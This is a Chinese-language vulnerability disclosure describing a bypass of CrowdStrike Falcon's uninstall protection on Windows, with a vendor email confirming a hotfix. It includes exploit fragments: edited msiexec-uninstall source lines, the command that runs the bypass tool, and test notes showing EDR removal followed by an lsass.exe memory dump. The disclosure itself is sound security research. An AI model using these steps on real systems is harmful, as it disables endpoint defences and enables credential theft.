CrowdStrike Falcon 是一种基于云的端点检测与响应(EDR)和防病毒(AV)解决方案。在每个终端设备上,部署了一个内核级管理传感器,并利用基于云的功能。该传感器可以配置卸载保护,防止在没有一次性生成的令牌的情况下在终端设备上卸载 CrowdStrike Falcon 传感器。
利用此漏洞,具有管理员权限的攻击者可以绕过 Windows 终端设备上的令牌检查,在未经适当授权的情况下从设备卸载传感器,从而有效移除设备的 EDR 和 AV 保护。
受影响的传感器版本:6.44.15806
Crowdstrike 支持团队确认邮件的摘录
...
As the referenced CVE was not released in coordination with CrowdStrike, it may be missing some details, however our customers
have been kept up to date on our remediation efforts and the affected sensor versions, including a release of the hotfix for v6.44.15806.
Please see the relevant tech alerts explaining the nature of this issue and the fix releases at
https://supportportal.crowdstrike.com/s/article/Tech-Alert-Uninstall-Protection-Bug-in-Falcon-Sensor-for-Windows
Therefore, I believe you can go ahead and publish the CVE adding the impacted Sensor versions
we were able to test and confirm they are affected.
...
正如邮件中所说,CrowdStrike 已经修补了受影响的版本。
# edit #1
Line 111: std::string cmd = "cmd /c start msiexec /x " + guid;
# edit #2
Line 67: if (g_msiexec_instance_count == 3 || g_msiexec_instance_count == 5) {
.\Falcon-6.44.15806-uninstall.exe "C:\ProgramData\Package Cache\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}v6.44.15806\CsAgent.msi"
测试机器名称:MOANA
策略:极度激进(所有选项已启用)

卸载进行中...

卸载完成(CrowdStrike 目录内不再有文件)- 如果守护进程仍在内存中运行,则需要重启(它将生成检测)

Moana 结果无法通过云访问

lsass.exe 的内存转储

Fortunato [fox] Lodari, Raffaele Nacca, Walter Oberacher, Davide Bianchin, Luca Bernardi @ Deda Cloud 网络安全团队